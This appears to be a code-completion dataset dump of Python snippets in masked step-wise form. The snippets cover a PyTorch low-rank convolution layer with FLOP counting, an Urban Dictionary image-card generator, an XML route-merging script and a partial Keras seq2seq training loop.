0.1)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n self.correlated_weights = torch.mm(self.column_weights, torch.mm(\n self.row_weights, self.conv_weights.reshape(self.filters //\n self.times, -1))).reshape(self.filters - self.filters // self.\n times, self.channels, self.kernel_size, self.kernel_size)\n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), bias=self.bias, padding=self.\n padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), padding=self.padding, stride=\n self.stride)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n self.correlated_weights = torch.mm(self.column_weights, torch.mm(\n self.row_weights, self.conv_weights.reshape(self.filters //\n self.times, -1))).reshape(self.filters - self.filters // self.\n times, self.channels, self.kernel_size, self.kernel_size)\n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), bias=self.bias, padding=self.\n padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), padding=self.padding, stride=\n self.stride)\n\n\ndef count_op_xCNNlow(m, x, y):\n x = x[0]\n multiply_adds = 1\n cin = m.channels\n cout = m.filters\n kh, kw = m.kernel_size, m.kernel_size\n batch_size = x.size()[0]\n out_h = y.size(2)\n out_w = y.size(3)\n kernel_ops = multiply_adds * kh * kw\n bias_ops = 1 if m.biasTrue is True else 0\n ops_per_element = kernel_ops + bias_ops\n output_elements = batch_size * out_w * out_h * cout\n conv_ops = output_elements * ops_per_element * cin // m.groups\n total_mul_1 = m.filters // m.times\n total_add_1 = total_mul_1 - 1\n num_elements_1 = m.rank * (cin * kh * kw)\n total_mul_2 = m.rank\n total_add_2 = total_mul_2 - 1\n num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)\n lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +\n total_add_2) * num_elements_2\n total_ops = lin_ops + conv_ops\n print(lin_ops, conv_ops)\n m.total_ops = torch.Tensor([int(total_ops)])\n",
"step-4": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass xCNNlow(torch.nn.Module):\n\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1,\n groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels // groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n self.conv_weights = nn.Parameter(torch.Tensor(filters // self.times,\n channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters - filters //\n self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters //\n self.times).to(device))\n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input):\n self.correlated_weights = torch.mm(self.column_weights, torch.mm(\n self.row_weights, self.conv_weights.reshape(self.filters //\n self.times, -1))).reshape(self.filters - self.filters // self.\n times, self.channels, self.kernel_size, self.kernel_size)\n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), bias=self.bias, padding=self.\n padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights, self.\n correlated_weights), dim=0), padding=self.padding, stride=\n self.stride)\n\n\ndef count_op_xCNNlow(m, x, y):\n x = x[0]\n multiply_adds = 1\n cin = m.channels\n cout = m.filters\n kh, kw = m.kernel_size, m.kernel_size\n batch_size = x.size()[0]\n out_h = y.size(2)\n out_w = y.size(3)\n kernel_ops = multiply_adds * kh * kw\n bias_ops = 1 if m.biasTrue is True else 0\n ops_per_element = kernel_ops + bias_ops\n output_elements = batch_size * out_w * out_h * cout\n conv_ops = output_elements * ops_per_element * cin // m.groups\n total_mul_1 = m.filters // m.times\n total_add_1 = total_mul_1 - 1\n num_elements_1 = m.rank * (cin * kh * kw)\n total_mul_2 = m.rank\n total_add_2 = total_mul_2 - 1\n num_elements_2 = (m.filters - m.filters // m.times) * (cin * kh * kw)\n lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 +\n total_add_2) * num_elements_2\n total_ops = lin_ops + conv_ops\n print(lin_ops, conv_ops)\n m.total_ops = torch.Tensor([int(total_ops)])\n",
"step-5": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# Const. low-rank version\nclass xCNNlow(torch.nn.Module):\n def __init__(self, channels, filters, kernel_size, padding=0, stride=1, groups=1, rank=1, bias=True):\n super(xCNNlow, self).__init__()\n self.filters = filters\n self.times = 2\n self.kernel_size = kernel_size\n self.channels = channels//groups\n self.padding = padding\n self.stride = stride\n self.biasTrue = bias\n self.rank = rank\n self.groups = groups\n\n self.conv_weights = nn.Parameter(torch.Tensor(filters//self.times, channels, kernel_size, kernel_size).to(device))\n self.column_weights = nn.Parameter(torch.Tensor(filters-filters//self.times, self.rank).to(device))\n self.row_weights = nn.Parameter(torch.Tensor(self.rank, filters//self.times).to(device))\n \n torch.nn.init.xavier_uniform(self.conv_weights)\n self.column_weights.data.uniform_(-0.1, 0.1)\n self.row_weights.data.uniform_(-0.1, 0.1)\n \n if self.biasTrue:\n self.bias = nn.Parameter(torch.Tensor(filters).to(device))\n self.bias.data.uniform_(-0.1, 0.1)\n\n def forward(self, input): \n self.correlated_weights = torch.mm(self.column_weights, torch.mm(self.row_weights,self.conv_weights.reshape(self.filters//self.times,-1)))\\\n .reshape(self.filters-self.filters//self.times, self.channels, self.kernel_size, self.kernel_size) \n if self.biasTrue:\n return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\\\n bias=self.bias, padding=self.padding, stride=self.stride)\n else:\n return F.conv2d(input, torch.cat((self.conv_weights,self.correlated_weights), dim = 0),\\\n padding=self.padding, stride=self.stride)\n\n\n#count FLOPs\ndef count_op_xCNNlow(m, x, y):\n x = x[0]\n\n multiply_adds = 1\n\n cin = m.channels\n cout = m.filters\n kh, kw = m.kernel_size, m.kernel_size\n batch_size = x.size()[0]\n\n out_h = y.size(2)\n out_w = y.size(3)\n\n # ops per output element\n # kernel_mul = kh * kw * cin\n # kernel_add = kh * kw * cin - 1\n kernel_ops = multiply_adds * kh * kw\n bias_ops = 1 if m.biasTrue is True else 0\n ops_per_element = kernel_ops + bias_ops\n\n # total ops\n # num_out_elements = y.numel()\n output_elements = batch_size * out_w * out_h * cout\n conv_ops = output_elements * ops_per_element * cin // m.groups\n\n # per output element\n total_mul_1 = m.filters//m.times\n total_add_1 = total_mul_1 - 1\n num_elements_1 = m.rank * (cin * kh * kw) # (m.filters - m.filters//m.times)\n total_mul_2 = m.rank\n total_add_2 = total_mul_2 - 1\n num_elements_2 = (m.filters - m.filters//m.times) * (cin * kh * kw) # (m.filters - m.filters//m.times)\n lin_ops = (total_mul_1 + total_add_1) * num_elements_1 + (total_mul_2 + total_add_2) * num_elements_2\n total_ops = lin_ops + conv_ops\n print(lin_ops, conv_ops)\n\n m.total_ops = torch.Tensor([int(total_ops)])\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_card(word, image_path, filepath='data/cards/', filename=None):
"""Функция для генерации и сохранения изображения
Возвращает filepath+filename
Параметры:
word - слово, чей контент будет на карточке
image - задний фон изображения
filepath - путь для хранения изображения
filename - имя изображения
"""
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(content=content, image=image, auth_font=fonts.
aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font
=fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.
word_font, thumb_font=fonts.thumb_font)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def save_card(word, image_path, filepath='data/cards/', filename=None):
"""Функция для генерации и сохранения изображения
Возвращает filepath+filename
Параметры:
word - слово, чей контент будет на карточке
image - задний фон изображения
filepath - путь для хранения изображения
filename - имя изображения
"""
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(content=content, image=image, auth_font=fonts.
aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font
=fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.
word_font, thumb_font=fonts.thumb_font)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
if __name__ == '__main__':
from random import randint
save_card(get_random_word(),
f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')
<|reserved_special_token_1|>
from PIL import Image
from src import urbandictionary_api
from src.card.cardDrawer import CardDrawer
from src.card.cardModel import CardModel
from src.repository import Repository
from src.urbandictionary_api import get_random_word
def save_card(word, image_path, filepath='data/cards/', filename=None):
"""Функция для генерации и сохранения изображения
Возвращает filepath+filename
Параметры:
word - слово, чей контент будет на карточке
image - задний фон изображения
filepath - путь для хранения изображения
filename - имя изображения
"""
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(content=content, image=image, auth_font=fonts.
aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font
=fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.
word_font, thumb_font=fonts.thumb_font)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
if __name__ == '__main__':
from random import randint
save_card(get_random_word(),
f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')
<|reserved_special_token_1|>
from PIL import Image
from src import urbandictionary_api
from src.card.cardDrawer import CardDrawer
from src.card.cardModel import CardModel
from src.repository import Repository
from src.urbandictionary_api import get_random_word
def save_card(word, image_path, filepath='data/cards/', filename=None):
'''Функция для генерации и сохранения изображения
Возвращает filepath+filename
Параметры:
word - слово, чей контент будет на карточке
image - задний фон изображения
filepath - путь для хранения изображения
filename - имя изображения
'''
content = urbandictionary_api.get_word_data(word)
image = Image.open(image_path)
rep = Repository()
fonts = rep.fonts
model = CardModel(
content=content,
image=image,
auth_font=fonts.aut_font,
cat_font=fonts.cat_font,
def_font=fonts.def_font,
ex_font=fonts.ex_font,
rect_font=fonts.rect_font,
word_font=fonts.word_font,
thumb_font=fonts.thumb_font
)
card_drawer = CardDrawer(model)
card_drawer.draw_card()
path = card_drawer.save(filepath=filepath, filename=filename)
return path
if __name__ == '__main__':
from random import randint
save_card(get_random_word(), f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')
|
flexible
|
{
"blob_id": "6bf1d410a33e3b2535e39e4f8c5c7f8278b3de67",
"index": 330,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n \"\"\"Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n \"\"\"\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(content=content, image=image, auth_font=fonts.\n aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font\n =fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.\n word_font, thumb_font=fonts.thumb_font)\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n return path\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n \"\"\"Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n \"\"\"\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(content=content, image=image, auth_font=fonts.\n aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font\n =fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.\n word_font, thumb_font=fonts.thumb_font)\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n return path\n\n\nif __name__ == '__main__':\n from random import randint\n save_card(get_random_word(),\n f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')\n",
"step-4": "from PIL import Image\nfrom src import urbandictionary_api\nfrom src.card.cardDrawer import CardDrawer\nfrom src.card.cardModel import CardModel\nfrom src.repository import Repository\nfrom src.urbandictionary_api import get_random_word\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n \"\"\"Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n \"\"\"\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(content=content, image=image, auth_font=fonts.\n aut_font, cat_font=fonts.cat_font, def_font=fonts.def_font, ex_font\n =fonts.ex_font, rect_font=fonts.rect_font, word_font=fonts.\n word_font, thumb_font=fonts.thumb_font)\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n return path\n\n\nif __name__ == '__main__':\n from random import randint\n save_card(get_random_word(),\n f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')\n",
"step-5": "from PIL import Image\n\nfrom src import urbandictionary_api\nfrom src.card.cardDrawer import CardDrawer\nfrom src.card.cardModel import CardModel\nfrom src.repository import Repository\nfrom src.urbandictionary_api import get_random_word\n\n\ndef save_card(word, image_path, filepath='data/cards/', filename=None):\n '''Функция для генерации и сохранения изображения\n Возвращает filepath+filename\n \n Параметры:\n word - слово, чей контент будет на карточке\n image - задний фон изображения\n filepath - путь для хранения изображения\n filename - имя изображения\n '''\n\n content = urbandictionary_api.get_word_data(word)\n image = Image.open(image_path)\n rep = Repository()\n fonts = rep.fonts\n model = CardModel(\n content=content,\n image=image,\n auth_font=fonts.aut_font,\n cat_font=fonts.cat_font,\n def_font=fonts.def_font,\n ex_font=fonts.ex_font,\n rect_font=fonts.rect_font,\n word_font=fonts.word_font,\n thumb_font=fonts.thumb_font\n )\n\n card_drawer = CardDrawer(model)\n card_drawer.draw_card()\n path = card_drawer.save(filepath=filepath, filename=filename)\n\n return path\n\n\nif __name__ == '__main__':\n from random import randint\n\n save_card(get_random_word(), f'data/template/backgroundimages/bgimg ({randint(1, 9)}).jpg')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
n = int(input())
m = int(input())
x = int(input())
y = int(input())
if m < n:
if m - x < x:
x = m - x
if n - y < y:
y = n - y
else:
if n - x < x:
x = n - x
if m - y < y:
y = m - y
if x < y:
print(x)
else:
print(y)
|
normal
|
{
"blob_id": "002cced6d24a4790d29f195355c795d609f744a7",
"index": 9134,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif m < n:\n if m - x < x:\n x = m - x\n if n - y < y:\n y = n - y\nelse:\n if n - x < x:\n x = n - x\n if m - y < y:\n y = m - y\nif x < y:\n print(x)\nelse:\n print(y)\n",
"step-3": "n = int(input())\nm = int(input())\nx = int(input())\ny = int(input())\nif m < n:\n if m - x < x:\n x = m - x\n if n - y < y:\n y = n - y\nelse:\n if n - x < x:\n x = n - x\n if m - y < y:\n y = m - y\nif x < y:\n print(x)\nelse:\n print(y)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WebCommandException(SoftException):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
<|reserved_special_token_1|>
from soft_exception import SoftException
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
<|reserved_special_token_1|>
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/web_client_api/__init__.py
from soft_exception import SoftException
class WebCommandException(SoftException):
def __init__(self, description):
super(WebCommandException, self).__init__(description)
|
flexible
|
{
"blob_id": "0f4864b745768994ea55a931e4d8b0681c058465",
"index": 2828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass WebCommandException(SoftException):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-4": "from soft_exception import SoftException\n\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-5": "# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: scripts/client/web_client_api/__init__.py\nfrom soft_exception import SoftException\n\nclass WebCommandException(SoftException):\n\n def __init__(self, description):\n super(WebCommandException, self).__init__(description)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for root in rootsToAdd:
for elem in root:
root1.append(elem)
rutas0k_10k.write('rutas/rutas0k-110k.xml')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
rutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')
rutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')
rutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')
rutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')
rutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')
rutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')
root1 = rutas0k_10k.getroot()
root2 = rutas10k_30k.getroot()
root3 = rutas30k_50k.getroot()
root4 = rutas50k_70k.getroot()
root5 = rutas70k_90k.getroot()
root6 = rutas90k_110k.getroot()
rootsToAdd = [root2, root3, root4, root5, root6]
for root in rootsToAdd:
for elem in root:
root1.append(elem)
rutas0k_10k.write('rutas/rutas0k-110k.xml')
<|reserved_special_token_1|>
import xml.etree.ElementTree as ET
rutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')
rutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')
rutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')
rutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')
rutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')
rutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')
root1 = rutas0k_10k.getroot()
root2 = rutas10k_30k.getroot()
root3 = rutas30k_50k.getroot()
root4 = rutas50k_70k.getroot()
root5 = rutas70k_90k.getroot()
root6 = rutas90k_110k.getroot()
rootsToAdd = [root2, root3, root4, root5, root6]
for root in rootsToAdd:
for elem in root:
root1.append(elem)
rutas0k_10k.write('rutas/rutas0k-110k.xml')
<|reserved_special_token_1|>
import xml.etree.ElementTree as ET
#tree = ET.parse('rutas/rutas_prueba.xml')
#treeToAdd = ET.parse('rutas/rutas_prueba_agregar.xml')
#root = tree.getroot()
#git rootToAdd = treeToAdd.getroot()
#for child in root:
# for test in child:
# print(test.tag, test.attrib)
#for elem in root.iter():
# print(elem.tag)
#prueba = [elem.tag for elem in root.iter()]
#print(prueba)
#print(ET.tostring(root, encoding='utf8').decode('utf8'))
# for elem in rootToAdd:
# root.append(elem)
#
# tree.write('rutas/probando_agregados.xml')
#get the tree for each routes file
rutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')
rutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')
rutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')
rutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')
rutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')
rutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')
#root for each routes tree
root1 = rutas0k_10k.getroot()
root2 = rutas10k_30k.getroot()
root3 = rutas30k_50k.getroot()
root4 = rutas50k_70k.getroot()
root5 = rutas70k_90k.getroot()
root6 = rutas90k_110k.getroot()
#each root except first root
rootsToAdd = [root2,root3,root4,root5,root6]
#add each element to the first tree
for root in rootsToAdd:
for elem in root:
root1.append(elem)
#write the tree to a new file
rutas0k_10k.write('rutas/rutas0k-110k.xml')
|
flexible
|
{
"blob_id": "b4b7e20c9558bd1b29a1c1fa24bfca8a2d292b27",
"index": 398,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n",
"step-3": "<mask token>\nrutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')\nrutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')\nrutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')\nrutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')\nrutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')\nrutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')\nroot1 = rutas0k_10k.getroot()\nroot2 = rutas10k_30k.getroot()\nroot3 = rutas30k_50k.getroot()\nroot4 = rutas50k_70k.getroot()\nroot5 = rutas70k_90k.getroot()\nroot6 = rutas90k_110k.getroot()\nrootsToAdd = [root2, root3, root4, root5, root6]\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n",
"step-4": "import xml.etree.ElementTree as ET\nrutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')\nrutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')\nrutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')\nrutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')\nrutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')\nrutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')\nroot1 = rutas0k_10k.getroot()\nroot2 = rutas10k_30k.getroot()\nroot3 = rutas30k_50k.getroot()\nroot4 = rutas50k_70k.getroot()\nroot5 = rutas70k_90k.getroot()\nroot6 = rutas90k_110k.getroot()\nrootsToAdd = [root2, root3, root4, root5, root6]\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n",
"step-5": "import xml.etree.ElementTree as ET\n\n#tree = ET.parse('rutas/rutas_prueba.xml')\n#treeToAdd = ET.parse('rutas/rutas_prueba_agregar.xml')\n\n#root = tree.getroot()\n\n#git rootToAdd = treeToAdd.getroot()\n\n#for child in root:\n# for test in child:\n# print(test.tag, test.attrib)\n\n\n#for elem in root.iter():\n# print(elem.tag)\n\n#prueba = [elem.tag for elem in root.iter()]\n#print(prueba)\n#print(ET.tostring(root, encoding='utf8').decode('utf8'))\n\n# for elem in rootToAdd:\n# root.append(elem)\n#\n# tree.write('rutas/probando_agregados.xml')\n\n#get the tree for each routes file\nrutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')\nrutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')\nrutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')\nrutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')\nrutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')\nrutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')\n\n#root for each routes tree\nroot1 = rutas0k_10k.getroot()\nroot2 = rutas10k_30k.getroot()\nroot3 = rutas30k_50k.getroot()\nroot4 = rutas50k_70k.getroot()\nroot5 = rutas70k_90k.getroot()\nroot6 = rutas90k_110k.getroot()\n\n#each root except first root\nrootsToAdd = [root2,root3,root4,root5,root6]\n\n#add each element to the first tree\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\n\n#write the tree to a new file\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
